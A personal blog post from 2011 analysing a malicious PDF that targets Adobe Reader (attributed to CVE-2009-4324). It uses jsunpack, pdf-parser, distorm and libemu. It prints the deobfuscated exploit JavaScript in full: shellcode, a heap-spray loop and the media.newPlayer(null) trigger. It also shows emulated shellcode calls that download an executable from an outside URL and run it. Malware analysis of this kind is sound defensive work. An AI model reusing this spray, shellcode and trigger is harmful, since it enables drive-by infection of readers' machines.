Thursday, October 13, 2011

analyzing 8008bf0a06a0ba4dca1c881f4955acc8


Recently, I started analyzing pdf-malware. I got myself a pdf to analyze from malwaredomainlist.com; the hash of the pdf is 8008bf0a06a0ba4dca1c881f4955acc8



1. Strings
To be honest, there wasn't much I could make sense of - the only piece of information I obtained was that it adhered to PDF 1.5 specification by looking at its header. Also I get the cross reference table.


2. I used the pdf.py we get along with jsunpack to get the following output :-


parsing 8008bf0a06a0ba4dca1c881f4955acc8.pdf
obj 1 0: 
tag Type                                          (TAG)
tag Catalog                                       (TAG)
tag Outlines = 2 0 R                              (TAGVAL)
tag Pages = 3 0 R                                 (TAGVAL)
tag OpenAction = 5 0 R                            (ENDTAG)
obj 2 0: 
tag Type                                          (TAG)
tag Outlines                                      (TAG)
tag Count = 0                                     (ENDTAG)
obj 3 0: 
tag Type                                          (TAG)
tag Pages                                         (TAG)
tag Kids = 4 0 R]                                 (TAGVAL)
tag Count = 1                                     (ENDTAG)
obj 4 0: 
tag Type                                          (TAG)
tag Page                                          (TAG)
tag Parent = 3 0 R                                (TAGVAL)
tag MediaBox = 0 0 612 792]                       (ENDTAG)
obj 5 0: 
tag Type                                          (TAG)
tag Action                                        (TAG)
tag S                                             (TAG)
tag JavaScript                                    (TAG)
tag JS = 6 0 R                                    (ENDTAG)
obj 6 0: 
tag Length = 2317                                 (TAGVAL)
tag Filter                                        (TAGVAL)
tag FlateDecode                                   (TAG)
tag ASCIIHexDecode                                (ENDTAG)
obj trailer: 
tag Size = 7                                      (TAGVAL)
tag Root = 1 0 R                                  (ENDTAG)
Found JavaScript (delayed) in 1 0 (0 bytes)
children [['Outlines', '2 0'], ['Pages', '3 0'], ['OpenAction', '5 0']]
tags [['TAG', 'Type', ''], ['TAG', 'Catalog', ''], ['TAGVAL', 'Outlines', '2 0 R'], ['TAGVAL', 'Pages', '3 0 R'], ['ENDTAG', 'OpenAction', '5 0 R']]
indata = <</T#79#70#65/C#61#74a#6c#6fg/Ou#74#6c#69n#65#73 2 0 R/Pag#65s 3 0 R/#4fp#65#6e#41#63t#69#6f#6e 5 0 
Found JavaScript (delayed) in 5 0 (0 bytes)
children [['JS', '6 0']]
tags [['TAG', 'Type', ''], ['TAG', 'Action', ''], ['TAG', 'S', ''], ['TAG', 'JavaScript', ''], ['ENDTAG', 'JS', '6 0 R']]
indata = <</#54ype/Ac#74#69#6f#6e/#53/Jav#61S#63#72ip#74/#4a#53 6 0 R>>
Found JavaScript in 6 0 (2090 bytes)
children []
tags [['TAGVAL', 'Length', '2317'], ['TAGVAL', 'Filter', ''], ['TAG', 'FlateDecode', ''], ['ENDTAG', 'ASCIIHexDecode', '']]
indata = <</Le#6eg#74h 2317/F#69lt#65#72[/#46late#44#65#63#6fd#65/A#53C#49IHex#44#65#63#6f#64e]>>streamxYY6 q
Wrote JavaScript (2177 bytes -- 87 headers / 2090 code) to file 8008bf0a06a0ba4dca1c881f4955acc8.pdf.out




Ok, so I haven't had to do much - the javascript in this file has been decompressed and written out to another file.


Here's what I get :-


c = []; zzzpages.push(c); this.numPages = zzzpages.length;


//jsunpack End PDF headers
var qdxIsPARawijkD = unescape("%uc3db%u74d9%uf424%u3158%ubbc9%ub4e1%u9ca2%u5eb1%u5831%u8318%u04c0%u5803%u56f5%u7757%ucce5%ubbd2%u97cc%u875b%ud7cf%uf2a8%u3556%ue92a%u526d%u1120%u5d92%ua2c7%u3bf5%uf8b1%u04f8%u676b%uec9b%u4179%u1c0e%uf497%u3304%u66be%u7276%u6352%u66d3%uf4bf%u1dfa%ue955%u981b%u6f30%u0cf1%udac9%u7d81%ud21c%u247b%u813b%u4369%ud1cf%uf94d%u3310%u3edc%ud1a8%u2380%u9de9%u9c4c%ua5d4%u48be%uf6cb%uea03%u40b1%u9103%ufb1e%u5aa3%u6a8c%u7a51%u1634%udc0f%ubc4f%u8435%u5bbd%u6fd3%u38d0%ue1f1%ue1ce%uef62%ueea7%ud011%ud849%u48b0%uc030%ufe9d%u3a88%u3147%u066b%u8c95%u1087%u7f59%ub8cc%u19c0%ue416%ud678%u03f8%uf0db%u57ea%uac3a%u50ea%uc726%u4db5%ud413%ubb7f%ud4fd%u62f5%u739c%u6230%u7f29%u4ee5%u1dcf%u8dfb%u8476%u3456%u7e41%u086c%ue798%uf2bf%uad08%u37f6%ue34a%u0160%u35f4%u3b1f%ufca1%u62fc%u9fbd%u5f34%uaaf2%u2ba3%uebcf%ud71e%u41b8%u7d07%u2937%ue7de%u8bd1%u05e3%udfd4%u2cea%ue23e%u3aee%uf742%u24fb%uf464%u9c11%uef78%udd07%u2d8c%uf527%u3490%ufc25%u2983%u986e%u5a9d%u4778%u67c0%ue17d%u79de%uff72%u8813%ufc98%u9653%u28c6%u9155%u0704%u9969%u501c%ube62%u383b%ud498%ucf49%udc96%ufc2b%uf69d%u0b91%u0ecf%u02dc%u0cf7%u1dd2%u1fd8%u1d18%u463e%uaa8b%u09ca%u7c76%u9d1d%uf5f1%u1b4f%u8c9b%ueffc%u1906%u6267%u8be7%uf602%u30d8%u9aad%u9945%u1b48%u65ef");
var EdDashDIgmMARzTFDgSvTTZUlJuZmRU = unescape("%u0c0c%u0c0c");
var TyhHR = unescape("%u0c0c%u0c0c%u4367%u6345%u6958%u6c69%u5859%u704e%u444d%u594f%u784e%u6353%u5457%u784e%u6972%u7265%u5a7a%u6852%u5157%u6d62%u6879%u6c77%u6e55%u5356%u7242%u6648%u456b%u6a58%u6f79%u7a45%u7874%u5456%u6c66%u7844%u764b%u6574");


while(EdDashDIgmMARzTFDgSvTTZUlJuZmRU.length <= 32768) EdDashDIgmMARzTFDgSvTTZUlJuZmRU+=EdDashDIgmMARzTFDgSvTTZUlJuZmRU;
EdDashDIgmMARzTFDgSvTTZUlJuZmRU=EdDashDIgmMARzTFDgSvTTZUlJuZmRU.substring(0,32768 - qdxIsPARawijkD.length);


memory=new Array();


for(i=0;i<0x2000;i++) {
memory[i]= EdDashDIgmMARzTFDgSvTTZUlJuZmRU + qdxIsPARawijkD;
}


util.printd("LvdryEwfMTmeCphVejMYFrqjrtGAtOoXRupB", new Date());
util.printd("ZnKRrNewyQTUFCwqObcZXLUsCASjMnaXIElD", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(TyhHR, new Date());




A few observations:- 

  • so "%u0c0c%u0c0c" suggests that its a nop sled for a heap overflow. The "while" loop seems to be constructing a nop sled of length 32768. "qdxIsPARawijkD" seems to be the shellcode that seems to do the nasty work. 
  • Just before the "//jsunpack END PDF headers" you have some stuff thats added automatically by "pdf.py". From what I have read so far, it seems that you would need to include that information for the exploit to load up, when you try running the js using something like SeaMonkey.





3. Finding the javascript entrypoint
I used pdf-parser by Didier Stevens; following is part of the output.


obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 3 0 R, 5 0 R
 [(2, '<<'), (2, '/T#79#70#65'), (2, '/C#61#74a#6c#6fg'), (2, '/Ou#74#6c#69n#65#73'), (1, ' '), (3, '2'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '/Pag#65s'), (1, ' '), (3, '3'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '/#4fp#65#6e#41#63t#69#6f#6e'), (1, ' '), (3, '5'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]


 <<
   /Type /Catalog
   /Outlines 2 0 R
   /Pages 3 0 R
   /OpenAction 5 0 R
 >>


obj 5 0
 Type: /Action
 Referencing: 6 0 R
 [(2, '<<'), (2, '/#54ype'), (2, '/Ac#74#69#6f#6e'), (2, '/#53'), (2, '/Jav#61S#63#72ip#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]


<<
  /Type /Action
  /S /JavaScript
  /JS 6 0 R
>>


obj 6 0
 Type: 
 Referencing: 
 Contains stream
 [(2, '<<'), (2, '/Le#6eg#74h'), (1, ' '), (3, '2317'), (2, '/F#69lt#65#72'), (2, '['), (2, '/#46late#44#65#63#6fd#65'), (2, '/A#53C#49IHex#44#65#63#6f#64e'), (2, ']'), (2, '>>'), (1, '\r\n')]


<<
 /Length 2317
 /Filter [
 /FlateDecode /ASCIIHexDecode]
>>


As you can see above the /OpenAction is set to the object which contains the Javascript; so that js should execute without any user intervention. "/OpenAction" is obfuscated as "/#4fp#65#6e#41#63t#69#6f#6e" - so its pretty useful to have pdf-parser here.


4. Understanding the shellcode


In order to understand the shellcode I used distorm and some regex in python. The disassembly is as follows:-


0x00000000 (02) dbc3                 FCMOVNB ST0, ST3
0x00000002 (04) d97424f4             FNSTENV [ESP-0xc]
; this is used as part of GetPC
0x00000006 (01) 58                   POP EAX
; at this point eax will have the eip.
0x00000007 (02) 31c9                 XOR ECX, ECX
; ecx set to 0
0x00000009 (05) bbe1b4a29c           MOV EBX, 0x9ca2b4e1
0x0000000e (02) b15e                 MOV CL, 0x5e
; counter set to 94
0x00000010 (03) 315818               XOR [EAX+0x18], EBX
; instruction at eax+0x18 are xored with 0x9ca2b4e1
0x00000013 (03) 83c004               ADD EAX, 0x4
0x00000016 (03) 0358f5               ADD EBX, [EAX-0xb]
0x00000019 (01) 56                   PUSH ESI
0x0000001a (01) 57                   PUSH EDI
0x0000001b (02) 77e5                 JA 0x2
[truncated]


Ok, so 0x18 = 24, the offset of 24 in between the instruction "XOR [EAX+0x18], EBX".


Analyzing the above shown assembly would be a lot faster if I could just run it somehow. Enter sctest from libemu. Skimming through the whole thing gives me a lot of xoring + loop statements. Towards the end I can see the imported functions being called and that helps get an idea of what the shellcode is attempting to do.




FARPROC WINAPI GetProcAddress (
     HMODULE hModule = 0x7df20000 => 
         none;
     LPCSTR lpProcName = 0x0041715b => 
           = "URLDownloadToFileA";
) = 0x7df7b0bb;
UINT GetSystemDirectory (
     LPTSTR lpBuffer = 0x00416fb2 => 
           = "c:\WINDOWS\system32";
     UINT uSize = 32;
) =  19;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 => 
         none;
     LPCTSTR szURL = 0x0041716e => 
           = "http://www.zeus4ever.net/calc.exe";
     LPCTSTR szFileName = 0x00416fb2 => 
           = "c:\WINDOWS\system32\a.exe";
     DWORD dwReserved = 0;
     LPBINDSTATUSCALLBACK lpfnCB = 0;
) =  0;
UINT WINAPI WinExec (
     LPCSTR lpCmdLine = 0x00416fb2 => 
           = "c:\WINDOWS\system32\a.exe";
     UINT uCmdShow = 0;
) =  32;
void ExitThread (
     DWORD dwExitCode = 32;
) =  0;


a.exe is downloaded from "http://www.zeus4ever.net/calc.exe" and stored at "c:\WINDOWS\system32\a.exe" and executed. Of course, the executable is not available now so, guess thats it.




5. Finding out the vulnerability exploited
The vulnerability seems to be CVE-2009-4324 and the exploit takes advantage of a vulnerability in the javascript module of Adobe Reader. The use-after-free vulnerability seems to be that calling self.media.newPlayer with a "null" argument.


Reference : http://vrt-blog.snort.org/2009/12/adobe-reader-medianewplayer-analysis.html




Many thanks to 0xff for his help.

No comments:

Post a Comment